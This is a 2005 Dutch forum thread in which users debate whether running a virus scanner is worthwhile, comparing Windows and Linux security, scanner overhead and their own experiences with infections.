Wel of niet een virusscanner gebruiken? - Privacy en beveiliging

zaterdag 10 december 2005 23:06

Acties:

0 Henk 'm!

Verwijderd

Bor de Wollef schreef op zaterdag 10 december 2005 @ 17:56:
Het is dus niet alleen het OS dat vatbar voor iets is, het is vooral het wanbeheer dat word uitgevoerd door de gemiddelde consument.

Een nieuwe wagen met 500km op de teller waarvan de motor vastloopt noem je een constructie of produktiefout en ga je zondermeer verhalen op de fabrikant en de garantie want zo een rotzooiwagen aanvaard jij nooit.

Maar een verse windows installatie die 10 minuten aan het net hangt en geinfecteerd raakt noem je wanbeheer van de gebruiker ?

Rare redenatie hebben jullie...

Dat kan met bv een Linux distrib ook niet echt imho. Ook daar zal je moeten patchen, gaatjes moeten vullen, configs moeten aanpassen etc.

Noem mij eens en linux distro die je 10 minuten fresh installed aan het net hangt en dan al zwaar geinfecteerd is ?

zaterdag 10 december 2005 23:11

Acties:

0 Henk 'm!

Verwijderd

Bor de Wollef schreef op zaterdag 10 december 2005 @ 21:24:
Wat is je punt met die opmerking? Omdat je voor het OS betaald hoef je zelf geen beheer meer uit te voeren? Omdat je ervoor betaald mogen er geen gaten in software zitten (wat gewoon onmogelijk is)?

Wat maakt het moeten betalen voor een OS anders aan de virus prefentie? Vind je dat dit gratis moet aangeboden / een verplicht onderdeel van het OS moet zijn?

Je betaalt wel (veel) voor een windows pakketje wat je niet als alleenstaand stukje software kan gebruiken.

En dat vindt jij normaal ?

Of koop jij een nieuwe wagen plus extra reservewielen, een betere benzinetank, ruitewissers en andere dingen waarvan je weet dat hetgeen standaard op de wagen zit onbetrouwbaar en eigelijk onbruikbaar is ?

Niet echt denk ik he...

Maar als je een officiele windows koopt ben je wel quasie verplicht ineens een AV en wat andere scan en clean tools te kopen om een bruikbaar systeem op te kunnen zetten.

Maar dat vinden jullie allemaal normaal ?

Wel, ik niet.

zaterdag 10 december 2005 23:31

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Verwijderd schreef op zaterdag 10 december 2005 @ 23:06:
[...]

Een nieuwe wagen met 500km op de teller waarvan de motor vastloopt noem je een constructie of produktiefout en ga je zondermeer verhalen op de fabrikant en de garantie want zo een rotzooiwagen aanvaard jij nooit.

Maar een verse windows installatie die 10 minuten aan het net hangt en geinfecteerd raakt noem je wanbeheer van de gebruiker ?

Als je een analogie wilt gebruiken neem dan een goede. Als jij een Linux distributie zonder patching etc aan het internet hangt (zonder firewall etc) dan heb je ook een behoorlijk risico op hacks / exploits etc. Daar is Windows niet anders in. Het verschil met Windows is dat het zoals eerder aangegeven is target #1 is. Jij gaf volgens mij zelf aan dat je met goed beheer en patching etc helemaal niet zo veel risico loopt (ivm met een ongepatched systeem). De mensen die Linux en soortgelijke OSsen gebruiken hebben over het algemeen meer verstand van hun OS dan de gemiddelde consument. Maar goed, ik vind de discussie "MS vs de rest" eigenlijk niet geheel in dit topic passen.

Het feit is gewoon dat je met een Windows machine een behoorlijke kans hebt op een infectie / hack als je deze ongepatched aan het internet hangt. In een perfect world is alles beter. Helaas is het geen perfect world en zul je dus moeten roeien met de riemen die je hebt (en af en toe zelf accessoires moeten kopen / gebruiken die de minder positieve kanten enigzins opvangen).

Noem mij eens en linux distro die je 10 minuten fresh installed aan het net hangt en dan al zwaar geinfecteerd is ?

Ik heb het niet over een Linux distro die naar 10 minuten fresh installed aan het net al zwaar geinfecteerd is. Ik heb het over het feit dat een fresh Linux install veelal evenmin veilig is door vulnerabilites / misconfiguratie etc. Wederom, het grootste deel van de malware richt zich op Windows waardoor je daar het grootste risico loopt.

Ik stel ook niet welke van de 2 OSsen het veiligst is. Dat heeft namelijk niet veel met de originele vraag uit dit topic te maken imho.

Of koop jij een nieuwe wagen plus extra reservewielen, een betere benzinetank, ruitewissers en andere dingen waarvan je weet dat hetgeen standaard op de wagen zit onbetrouwbaar en eigelijk onbruikbaar is ?

Wederom geen goede analogie. Een goed gepatched en geconfigged Windows systeem is redelijk veilig, hetzelfde geldt voor een Linux systeem of een ander OS. Een AV scanner is alleen maar om in een beperkte mate te helpen in de gevallen waarin de standaard veiligheid van het OS niet genoeg is, zoals in het geval van exploitbare gaten etc. Om dezelfde reden gebruik je bv een firewall. Als de OSsen en programma's compleet waren had je die ook niet nodig namelijk.

[ Voor 19% gewijzigd door Bor op 10-12-2005 23:35 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zaterdag 10 december 2005 23:37

Acties:

0 Henk 'm!

RemcoDelft

TS draait Linux?

Ontopic: In de tijd dat ik nog Windows gebruikte (95 en NT) deed ik het ook altijd zonder virusscanner> Simpelweg omdat de scanner zo belachelijk veel meer kwaad dan goed deed! Namelijk: recourses vreten, zonder ooit een virus te vinden! Waarom zou ik m'n computer dan trager laten maken?

zaterdag 10 december 2005 23:57

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

RemcoDelft schreef op zaterdag 10 december 2005 @ 23:37:
Ontopic: In de tijd dat ik nog Windows gebruikte (95 en NT) deed ik het ook altijd zonder virusscanner> Simpelweg omdat de scanner zo belachelijk veel meer kwaad dan goed deed! Namelijk: recourses vreten, zonder ooit een virus te vinden! Waarom zou ik m'n computer dan trager laten maken?

Er is nou al zo vaak aangegeven dat resource met de huidige generatie scanners en pc's geen issue meer is. Wat betreft het niet vinden van virussen: in het verleden behaalde resulaten bieden geen garantie voor de toekomst. Dat je het een tijdje zonder virusscanner hebt gered zegt totaal niets over de huidige en komende periode. Echt, ik sta versteld van het valse gevoel van veiligheid dat veel "tweakers" hier hebben. Juist mensen met verstand van zaken zouden de gevaren goed moeten kunnen inschatten en op basis van deze gevaren juiste countermeasures moeten kunnen uitzoeken.

Natuurlijk is de huidige generatie AV software niet perfect, we werken voor het grootste gedeelte nog steeds met definitiebestanden, maar het is wel het enige serieuze hulpmiddel tegen virussen en andere malware wat er op dit moment is. Opmerkingen over dat bv andere browsers als IE en andre mailpakketten dan Outlook Express veilig zou zijn raken kant noch wal. Elke softwarepakket bevat fouten net als elk OS. Het is meer belangrijk hoe je met die fouten omgaat. Steek je je kop in het zand en ga je net doen alsof de "andere" software wel geheel veilig is dan ben je vroeg of laat de sigaar. Dit risico blijf je altijd houden. Het is een risico dat je nooit voor de volle 100% kunt wegnemen. Door het gebruik van risicobeperkende maatregelen als een personal firewall en een AV scanner kun je dit risico wel vele malen verkleinen.

[ Voor 64% gewijzigd door Bor op 11-12-2005 00:06 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zondag 11 december 2005 01:21

Acties:

0 Henk 'm!

Verwijderd

We Are Borg schreef op zaterdag 10 december 2005 @ 10:59:
[...]

En een echte .doc van je school/werk? Open je die ook niet? Want in een .doc kunnen ook leuke virussen zitten kan ik je vertellen, maar toch wil ik die dingen graag gebruiken en openen

dat is een makkie natuurlijk. even de shift toets ingedrukt houden tijdens openen ofwel de macro-beveiliging wat hoger zetten, tenzij die minstens steeds op gemiddeld staat zoals bij mezelf.

zondag 11 december 2005 01:26

Acties:

0 Henk 'm!

Verwijderd

Bor de Wollef schreef op zaterdag 10 december 2005 @ 11:16: Ook een executable (vpn client om in te loggen op netwerk van de klant) was geinfecteerd. Kortom, materiaal wat ik nodig heb voor mijn werk.

kom je niet zo vaak tegen. ik geef toe dat ik executables af en toe eens voorleg aan jotti, maar als ze gewoon werken in de vm machine hoeft dat voor mij niet...
onder geen enkel beding zal ik onbekende - dus doorgemailde - executables zomaar uitvoeren op m'n machine, dikwijls neem ik dan ook even de md5 om mee te googlen, en altijd zoek ik eerst uit op het net wat de executable is.

zondag 11 december 2005 01:37

Acties:

0 Henk 'm!

Verwijderd

Bor de Wollef schreef op zaterdag 10 december 2005 @ 23:57:
[...]

Er is nou al zo vaak aangegeven dat resource met de huidige generatie scanners en pc's geen issue meer is.

het plaatje is genuanceerder dan jij voorstelt. ik verwijs ten eerst nog eens naar m'n post over de devices/drivers en ten tweede gaat een aanvaardbare prestatiedaling vaak gepaard met het uitschakelen van belangrijke detectiefeatures van het av.

Wat betreft het niet vinden van virussen: in het verleden behaalde resulaten bieden geen garantie voor de toekomst.

goede opmerking! exact hetzelfde geldt voor av-soft! wat wel redelijk goed voorspelbaar is, is de buitengewone zwakke prestatie van av's bij remote systemexploits, je mag er zeker van zijn dat ze in de toekomst even slecht zullen blijven presteren op dat gebied.

Dat je het een tijdje zonder virusscanner hebt gered zegt totaal niets over de huidige en komende periode. Echt, ik sta versteld van het valse gevoel van veiligheid dat veel "tweakers" hier hebben.

nee hoor, het zijn meestal de av-mensen die dat valse gevoel hebben.

Juist mensen met verstand van zaken zouden de gevaren goed moeten kunnen inschatten en op basis van deze gevaren juiste countermeasures moeten kunnen uitzoeken.

precies. alleen houden die countermeasures niet noodzakelijk het gebruik van av in.

zondag 11 december 2005 01:54

Acties:

0 Henk 'm!

Verwijderd

pasta schreef op zaterdag 10 december 2005 @ 21:24:
[...]
Voor support, omscholing etc. betaal je ook als je de overstap naar Linux maakt. Dat is een beetje een non-argument.

nou breekt m'n klomp. je gaat toh niet beweren dat een tweaker ook maar 1 cent gaat uitgeven bij z'n overstap naar linux

zondag 11 december 2005 01:59

Acties:

0 Henk 'm!

Verwijderd

Bor de Wollef schreef op zaterdag 10 december 2005 @ 17:56:Je geeft zelf al een punt aan: Windows wordt vele malen meer gebruikt dan welk systeem dan ook. Daarnaast heeft Linux etc net zo goed last van lekken / exploits etc. Ook die systemen hebben last van DOS exploits, hacks, rootkits, etc.

het grootste probleem met windows is nog altijd dat de default install zeer kwetsbaar is, vooral vanwege het standaard gebruik van het admin acount - xp sp2 zet immers alle belangrijke poorten zowiezo al dicht. een default linux installatie is een stuk veiliger dan een default windows installatie.

zondag 11 december 2005 12:04

Acties:

0 Henk 'm!

Vagabonding

RemcoDelft schreef op zaterdag 10 december 2005 @ 23:37:
TS draait Linux?

Ontopic: In de tijd dat ik nog Windows gebruikte (95 en NT) deed ik het ook altijd zonder virusscanner> Simpelweg omdat de scanner zo belachelijk veel meer kwaad dan goed deed! Namelijk: recourses vreten, zonder ooit een virus te vinden! Waarom zou ik m'n computer dan trager laten maken?

Ik wil hier toch even op reageren, aangezien deze argument steeds word gebruikt (en evenveel keren word ontkracht). Het aantal resources wat een scanner gebruikt hangt van het scanner zelf af wat je gebruikt. Een scanner als AVG verbruikt nauwelijks systeembronnen. Je kan ook trials uitproberen en dan kijken welke scanner lekker werkt en weinig systeembronnen gebruikt. Ik gebruik al een aantal maanden Nod32 tot mijn volle tevredenheid. Nod32 doet vrijwel alles automatisch na het installeren. Het update dagelijks en je ziet er helemaal niets van dat het aan het updaten is. Als je dan naar taakbeheer kijkt dan zie je dit:

Afbeeldingslocatie: http://www.kugendiran.demon.nl/nod32.png

Afbeeldingslocatie: http://www.kugendiran.demon.nl/nod32.png

Dan kan ik zelfs nog nod32kui.exe afsluiten, aangezien nod32 ook werkt zonder gui.

Dus het argument dat virus scanners je systeem zoveel vertragen dat het onwerkbaar word, is hierbij wel ontkracht.

[ Voor 5% gewijzigd door Vagabonding op 11-12-2005 12:06 ]

zondag 11 december 2005 13:04

Acties:

0 Henk 'm!

CycloneX

Born on probation

Gebruik sinds ik internet heb (97) geen virusscanner of antispyware programma's.

Waarom niet heel simpel, gezond verstand lange ervaring, surfgedrag, mail gedrag etc... Heb ook een tijd bij een computerzaak gewerkt daar kwamen pc's binnen die helemaal overhoop lagen oorzaak viruspakketten zelf (vooral Norton)

Was de pc klaar werd er doodleuk een nieuw virusscanprogramma meeverkocht. Ik heb overigens een hekel aan Norton (komop een scanner die asociaal veel bronnen gebruikt)

Dan de vraag hoe weetje dan dat je geen virussen hebt nou ervaring (zie alinea hierboven) virussen en spyware haal je zelf binnen. Virussen en spyware zijn ook heel simpel te signaleren (er zijn uitzonderingen) systeembronnen/vreemde bestanden/popups etc.... Ik heb overigens wel eens een virus gehad op mijn pc

(zat in bijlage van mailtje die ik nog niet had geopend) deze vond ik via het programma McAfee Stinger 2.5.X zodra er van dit programma nieuwe versie is scan ik altijd ff mijn pc ermee. Als ik spyware vermoed dan gebruik ik de tool Active Ports om te kijken wel bestand stiekuhm contact maakt met het internet.

Voor de rest heb ik een firewall in mijn router/switch en scant mij provider ook mijn mail. Bij familie en vrienden adviseer ik altijd AVG mede vanwege de simpelheid en gebruik systeembronnen

[update: zat topic nog beetje door te lezen]

Mensen die zeggen dat er nog steeds geen goeie argumenten zijn om geen virusscanner te draaien moeten die er dan zijn? Ik kom bij mensen die nooit hun virusscanner updaten, of waar de virusscanner geen eens staat geactiveerd of zelfs is verlopen. Weetje hoeveel mensen hun virusscanner niet updaten idd heel veel. Die denken ah er staat iets met antivirus in het startmenu het zal wel goed zijn.

De computerzaak waar ik heb gewerkt gebruike virusscanners als goudmijntje lekker meeverkopen met iets, de klant lekker maken met u bent nooit veilig zonder virusscanner (het zit tussen de oren) en ze trappen er elke keer weer in huppa weer €49.

Wie zegt dat een virusscanner alles pakt in principe lopen hun achter de feiten aan, komt er een virus uit dan zullen hun heel snel met een anti-gif moeten komen misschien komt ie in de tussentijd op je pc. Er zijn tienduizende virussen waarvan misschien 0,01% de consument/tweaker misschien bereikt.

Virussen/spyware zijn onvindbaar mwah nie echt:

- processen
- last created files
- vreemde bestanden
- regedit
- check je active poorten eens naar buiten

Komop zeg de huidige generatie virussen zijn hoe leg ik lekken in Windows bloot (Blaster)

[ Voor 33% gewijzigd door CycloneX op 11-12-2005 13:40 ]

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

zondag 11 december 2005 13:20

Acties:

0 Henk 'm!

Bob

Pinata schreef op zondag 11 december 2005 @ 12:04:
[...]

[afbeelding]

Dan kan ik zelfs nog nod32kui.exe afsluiten, aangezien nod32 ook werkt zonder gui.

Dus het argument dat virus scanners je systeem zoveel vertragen dat het onwerkbaar word, is hierbij wel ontkracht.

Mijn probleem met een scanner is dat die telkens de boel vertraagt als er een prog gestart wordt, dat ie niets verbruikt als er niets te doen valt is maar normaal.

zondag 11 december 2005 13:36

Acties:

0 Henk 'm!

martijnve

Ik ben het eens met de viruscannerloze mensen hier.

Ik zit gewoon achter een router/firewall, gebuik firefox en mijn gezonde verstand.
Elke paar maanden installeer ik een virusscanner, scan, en flikker hem weer weg (AVG) omdat ik geen onnodige troep op mijn pc wil hebben (draaien).

en ik vind NOOIT een virus (de enige keer sinds ik pc's gebruik was in 2002) maar die was binnen gekomen via de pc van mn broertje (die overgens wel een virusscanner heefd, en ook erg breezah is

)
dat was trouwens wel vet kut want die stond in een paar dagen op heel het netwerk (toen: 3pc's en 1 laptop) en die verving alle bestanden die je opende met een kopie van zigzelf

en als ik een virus krijg, of als mijn pc gewoon traag word, zet ikeen image van windows terug en kan ik weer verder (heb alle niet windows bestanden op apparte partities staan)

Mini-ITX GamePC: Core i5 3470 | 16GB DDR3 | GTX 970 4GB | Samsung 830 128GB | Dell u2711 (27", IPS,1440p), 2343BW

zondag 11 december 2005 13:37

Acties:

0 Henk 'm!

swampy

Coconut + Swallow = ?

Bob_A schreef op zondag 11 december 2005 @ 13:20:
[...]

Mijn probleem met een scanner is dat die telkens de boel vertraagt als er een prog gestart wordt, dat ie niets verbruikt als er niets te doen valt is maar normaal.

Als de virus scanner gewoon CRC's bijhoudt hoeft dat niet. Een beetje virusscanner zal niet elke keer hetzelfde ONVERANDERDE programma gaan scannen.

Dat sommige virus scanners dat truukje nog niet kennen.

Bij mij zit Kaspersky Antivirus Personal Pro totaal niet in de weg... zelf als ik games opstart..geen enkel probleem!

There is no place like ::1

zondag 11 december 2005 14:13

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Verwijderd schreef op zondag 11 december 2005 @ 01:37:
[...]
het plaatje is genuanceerder dan jij voorstelt. ik verwijs ten eerst nog eens naar m'n post over de devices/drivers en ten tweede gaat een aanvaardbare prestatiedaling vaak gepaard met het uitschakelen van belangrijke detectiefeatures van het av.

Daar is ook al op geantwoord.

goede opmerking! exact hetzelfde geldt voor av-soft! wat wel redelijk goed voorspelbaar is, is de buitengewone zwakke prestatie van av's bij remote systemexploits, je mag er zeker van zijn dat ze in de toekomst even slecht zullen blijven presteren op dat gebied.

Heb je voorbeelden van de "buitengewone zwakke prestatatie van av's bij remote systemexploits"? Zonder onderbouwing heeft zo'n opmerking weinig waarde namelijk.

nee hoor, het zijn meestal de av-mensen die dat valse gevoel hebben.

Lol, als je dit topic een beetje volgt zul je zien dat het juist precies andersom is.

precies. alleen houden die countermeasures niet noodzakelijk het gebruik van av in.

Natuurlijk houden die countermeasures niet noodzakelijk het gebruik van een av in, echter als je een van de meest serieuze countermeasures zoekt om deze risico's tegen te gaan kom je toch weer bij een AV scanner uit. Andere mogelijkheden zijn er namelijk niet tot nauwlijks.

Verwijderd schreef op zondag 11 december 2005 @ 01:59:
[...]
het grootste probleem met windows is nog altijd dat de default install zeer kwetsbaar is, vooral vanwege het standaard gebruik van het admin acount - xp sp2 zet immers alle belangrijke poorten zowiezo al dicht. een default linux installatie is een stuk veiliger dan een default windows installatie.

Dat ontken ik ook niet. Nogmaals, de discussie veiligheid van Windows vs Linux (of andersom) heeft weinig met de discussie in dit topic te maken.

Verwijderd schreef op zondag 11 december 2005 @ 01:21:
[...]

dat is een makkie natuurlijk. even de shift toets ingedrukt houden tijdens openen ofwel de macro-beveiliging wat hoger zetten, tenzij die minstens steeds op gemiddeld staat zoals bij mezelf.

Ik ben erg blij dat mijn virusscanner de meeste van dit soort virussen ook gewoon meldt en afvangt zodat ik eventuele besmettingshaarden kan identificeren.

CycloneX schreef op zondag 11 december 2005 @ 13:04:

Dan de vraag hoe weetje dan dat je geen virussen hebt nou ervaring (zie alinea hierboven) virussen en spyware haal je zelf binnen. Virussen en spyware zijn ook heel simpel te signaleren (er zijn uitzonderingen) systeembronnen/vreemde bestanden/popups etc....

De onwaarheid van deze opmerking is al meerdere malen aangegeven in dit topic.

Wie zegt dat een virusscanner alles pakt in principe lopen hun achter de feiten aan.

Ik lees ook niet echt posts van mensen hier die dat beweren. Sterker nog, de meeste zijn het op dit punt absoluut met je eens.

Virussen/spyware zijn onvindbaar mwah nie echt:

- processen
- last created files
- vreemde bestanden
- regedit
- check je active poorten eens naar buiten

Lees het topic nog eens door zou ik zeggen. Hier is namelijk al meerdere malen op gereageerd. Daarnaast ben jij nooit in staat al deze zaken continu te monitoren.

[ Voor 49% gewijzigd door Bor op 11-12-2005 14:22 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zondag 11 december 2005 15:08

Acties:

0 Henk 'm!

MBV

Verwijderd schreef op zaterdag 10 december 2005 @ 23:06:
[...]

Een nieuwe wagen met 500km op de teller waarvan de motor vastloopt noem je een constructie of produktiefout en ga je zondermeer verhalen op de fabrikant en de garantie want zo een rotzooiwagen aanvaard jij nooit.

Maar een verse windows installatie die 10 minuten aan het net hangt en geinfecteerd raakt noem je wanbeheer van de gebruiker ?

Rare redenatie hebben jullie...

[...]

Noem mij eens en linux distro die je 10 minuten fresh installed aan het net hangt en dan al zwaar geinfecteerd is ?

Linux distro: Debian sarge RC2, de kernel die daarin zat was gevoelig voor rootkits. Ik heb er igg last van gehad. User/pass te simpel gehad om te testen, stelletje jokers van een Italiaanse Uni heeft toen een rootkit geinstalleerd

Voorlopig is er geen enkel stuk software dat zo solide is als een auto. Kijk maar naar de connexxion busjes

. Software is voorlopig gedoemd om fouten te bevatten, doordat het zo immens complex is.

zondag 11 december 2005 18:30

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

CycloneX schreef op zondag 11 december 2005 @ 13:04:

Virussen/spyware zijn onvindbaar mwah nie echt:

- processen
- last created files
- vreemde bestanden
- regedit
- check je active poorten eens naar buiten

Zou je de besmetting niet liever willen voorkomen dan domweg achteraf brandjes te blijven blussen?

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zondag 11 december 2005 18:50

Acties:

0 Henk 'm!

Bob

Bor de Wollef schreef op zondag 11 december 2005 @ 18:30:
[...]

Zou je de besmetting niet liever willen voorkomen dan domweg achteraf brandjes te blijven blussen?

Sja, het lijkt me toch dat er nog een hoop mensen zijn die het niet erg vinden dat ze eventueel griep kunnen krijgen als ze eens buitenkomen.
Hallooo, kans is klein, overlast miniem, en deze discussie begint saai te worden

zondag 11 december 2005 18:53

Acties:

0 Henk 'm!

Ruzor

Off with his head man

Bob_A schreef op zondag 11 december 2005 @ 18:50:
[...]

Sja, het lijkt me toch dat er nog een hoop mensen zijn die het niet erg vinden dat ze eventueel griep kunnen krijgen als ze eens buitenkomen.
Hallooo, kans is klein, overlast miniem, en deze discussie begint saai te worden

Griep? Mag je hopen

Jij hebt kennelijk geen idee wat virussen kunnen veroorzaken. De kans is ook niet klein, ga je eens in de materie verdiepen (Bob_A in "Wel of niet een virusscanner gebruiken?")

[ Voor 22% gewijzigd door Ruzor op 11-12-2005 18:55 ]

[This is what you get when you mess with us]

zondag 11 december 2005 19:00

Acties:

0 Henk 'm!

Bob

Ruzor schreef op zondag 11 december 2005 @ 18:53:
[...]

Griep? Mag je hopen Jij hebt kennelijk geen idee wat virussen kunnen veroorzaken. De kans is ook niet klein, ga je eens in de materie verdiepen (Bob_A in "Wel of niet een virusscanner gebruiken?")

Een virus in 5 jaar tijd op 1 van de 3 pc's noem ik het gevolg van een kleine kans. Persoonlijke ervaring en persoonlijke interpretatie van een kleine kans. Zo goed als geen last gehad met dat ding btw.
Wat noem jij een kleine kans?

edit: hm. statistieken van een het eerste virus dat bij Belgie stond. Angstaanjagend, niet? Een piek van wel 130 geinfecteerde pc's...
http://www.trendmicro.com...AVA%5FBYTEVER%2EA&VSect=S

[ Voor 21% gewijzigd door Bob op 11-12-2005 19:04 ]

zondag 11 december 2005 19:10

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Ruzor schreef op zondag 11 december 2005 @ 18:53:
[...]

Griep? Mag je hopen Jij hebt kennelijk geen idee wat virussen kunnen veroorzaken.

Inderdaad, onderschatting van het risico en de "kracht" van moderne malware zie je helaas vaker in dit topic. Het is moeilijk de impact van malware in te schatten imho omdat de kans op een relatief onschadelijk virus net zo groot is als de kans op een enorm destructief virus. Helaas lijken virussen van de laatste categorie steeds vaker voor te komen.

Daarnaast pak je een low / medium risk virus met een infectie alleen door trend micro gemeten op basis van gebruikers die zo goed zijn om stats te laten versturen van: Total 682,827.

Note: The number of infected computers reflected here (the Statistics tab) is based on the number of detections made by Housecall, Trend Micro's online scanner, and some Trend Micro products.

[ Voor 37% gewijzigd door Bor op 11-12-2005 19:19 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zondag 11 december 2005 19:13

Acties:

0 Henk 'm!

CycloneX

Born on probation

Ruzor schreef op zondag 11 december 2005 @ 18:53:
[...]

Griep? Mag je hopen Jij hebt kennelijk geen idee wat virussen kunnen veroorzaken. De kans is ook niet klein, ga je eens in de materie verdiepen ([MESSAGE=24 785079]Bob_A in "Wel of niet een virusscanner gebruiken?"[/MESSAGE])

Vertel waarom is die kans niet klein en hebben gebruikers die geen virusscanner hebben daar straks wel last van. Het is gewoon grappig dat alle mensen die in dit topic geen scanner gebruiken vaak met de zelfde argumenten komen en hebben ze zelden tot geen last hebben van virussen?

Ik vind 1 tot 2 virussen in 8 jaar op internet erg weinig en dat ik daarvoor het brandje moet blussen neem ik op de koop toe.

Ik wil wel eens van jullie weten wat voor soort gevaarlijke virussen jullie precies bedoelen

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

zondag 11 december 2005 19:30

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

CycloneX schreef op zondag 11 december 2005 @ 19:13:
[...]

Vertel waarom is die kans niet klein en hebben gebruikers die geen virusscanner hebben daar straks wel last van. Het is gewoon grappig dat alle mensen die in dit topic geen scanner gebruiken vaak met de zelfde argumenten komen en hebben ze zelden tot geen last hebben van virussen?

Meerdere mensen die hier posten dat ze geen virusscanner gebruiken zijn al het slachtoffer geweest van een infectie. Daarnaast lees ik ook inderdaad dezelfde argumenten. Een van de vaak voorkomende argumenten is dat een AV oplossing te veel belasting voor het systeem zou volgen. Meerdere tweakers antwoorden daar op dat dit met de huidige scanners geen issue meer mag zijn op een moderne pc. Kortom, we lopen steeds in rondjes. Steeds weer posten mensen al eerder geposte argumenten die daarna weer met dezelfde tegenargumenten teniet gedaan worden. Bovendien geeft het gros van de mensen die geen scanner gebruiken toch aan wel een / regelmatig te scannen met een AV product of een online AV scanner. Dat geeft imho ook wel wat aan: blijkbaar is men niet helemaal zeker van de eigen argumenten en kennis / ervaring. Verder komen helaas veel argumenten naar boven die niet juist blijken te zijn en / of gebaseerd op kennisgebrek aangaande malware. Het lijkt zelfs af en toe alsof het "stoer" is geen scanner te gebruiken omdat men het idee heeft dezelfde controle en preventie zelf manueel uit te kunnen voeren. Bovendien hebben mensen die verklaren totaal nooit te scannen geen enkel meetinstrument om de veiligheid in redelijke mate (een virusscanner pakt ook niet alles zoals al eerder aangegeven) op een objectieve manier te toetsen.

Maken mensen zonder AV product bv ook gebruik van online banking diensten?

CycloneX schreef op zondag 11 december 2005 @ 19:13:
[...]

Ik vind 1 tot 2 virussen in 8 jaar op internet erg weinig en dat ik daarvoor het brandje moet blussen neem ik op de koop toe.

Aantal virussen != impact van de besmetting.

[ Voor 8% gewijzigd door Bor op 11-12-2005 19:31 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zondag 11 december 2005 19:35

Acties:

0 Henk 'm!

CycloneX

Born on probation

Jah mijnpostbank

Je heb zeker gelijk met je post, wat ik al ze 8 jaar op inet en 1 tot 2 virussen en ja soms scan ik ff met McAfee Stinger 2.5.X maarja full-time een virusscan nee nooit gehad. Misschien is het gemakzucht ik weet niet. Misschien ga ik ooit eens goed op mijn bek die kans is er altijd. Maja tis 8 jaar goed gegaan en dat zegt voor mij ook iets. Als ik misschien een virusscan had dan had ik die 1/2 virussen voortijdig gepakt had mij achteraf brandjes blussen gescheeld

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

zondag 11 december 2005 20:00

Acties:

0 Henk 'm!

Verwijderd

Ik kan ook niet anders dan tot de conclusie komen dat virusscanners vrij nutteloos zijn voor de wat meer ervarende mensen (huis/tuin en keuken mensen zullen er baat bij hebben maar daar zal het wel ophouden imo).

Met een gezond verstand browsen, software/OS up to date houden, weten wat je installed, wat je processen zijn etc. zal 99% van de kwade code uit je systeem houden. Virussen die flinke schade aanrichten worden meestal niet direct opgemerkt door de virusscanners, en dan ben je alsnog de l*l.

Hoe heette dat virus dat je systeem binnen 1 minuut rebooten deed? Wat konden virusscanners daar aan doen? Konden ze het voorkomen dat er binnen 1 minuut gereboot werd om de virus onschadelijk te maken? Heb er zelf nooit last van gehad omdat ik mijn Windows up to date had (en nu nog steeds heb). En veel virusscanners kunnen in het algemeen niet eens een virus verwijderen/onschadelijk maken daar moet je dan eerst weer speciale tooltjes voor downloaden. Net zoveel werk dan als je geen scanner hebt en je komt er meestal pas achter als het toch al te laat is. Alhoewel het bij een 'echte' virus het meestal beter is een format te doen op alle schijven.

Vals gevoel van veiligheid die virusscanners, een virus voor de nullen en enen heet niet voor niets zo, common bekende virusroutines om nieuwe te ontdekken zullen misschien handig zijn maar een 'echte' virus zullen ze nooit direct tegen kunnen houden. Het begrip virus en exploit wordt overigens nog weleens door elkaar heen gehaalt wat imo onterecht is.

Een virus is in mijn ogen iets wat echt schade berokkend aan het systeem zoals die ene die jpg bestanden onbruikbaar maakt. Een exploit is imo iets wat misbruik maakt van fout geschreven software en dat komt veel vaker voor heb ik het idee wat meestal dus te voorkomen is door je software up to date te houden.

[ Voor 3% gewijzigd door Verwijderd op 11-12-2005 20:01 ]

zondag 11 december 2005 20:05

Acties:

0 Henk 'm!

Daos

Bob_A schreef op zondag 11 december 2005 @ 19:00:
[...]

Een virus in 5 jaar tijd op 1 van de 3 pc's noem ik het gevolg van een kleine kans. Persoonlijke ervaring en persoonlijke interpretatie van een kleine kans. Zo goed als geen last gehad met dat ding btw.
Wat noem jij een kleine kans?

edit: hm. statistieken van een het eerste virus dat bij Belgie stond. Angstaanjagend, niet? Een piek van wel 130 geinfecteerde pc's...
http://www.trendmicro.com...AVA%5FBYTEVER%2EA&VSect=S

Dat voorbeeldje is nu net een geval dat je niet met een beetje slim zijn tegenhoudt

. Het maakt gebruik van een fout in de Java VM. Java kan standaard gebruikt worden door een website. Je hoeft dus alleen maar een bepaalde website te bezoeken en je krijgt dit automatisch.

Ik heb er ook last van gehad en heb toen dit topic geopend (0 replies

): Sun Java ook gevoelig voor hack?. Nu heb ik alles wat met Java en ActiveX te maken heeft uitstaan.

Zou een virusscanner zoiets wel tegenhouden? Linkje en nog een linkje om te proberen.

[ Voor 6% gewijzigd door Daos op 11-12-2005 20:07 ]

zondag 11 december 2005 20:06

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Verwijderd schreef op zondag 11 december 2005 @ 20:00:
Ik kan ook niet anders dan tot de conclusie komen dat virusscanners vrij nutteloos zijn voor de wat meer ervarende mensen (huis/tuin en keuken mensen zullen er baat bij hebben maar daar zal het wel ophouden imo).

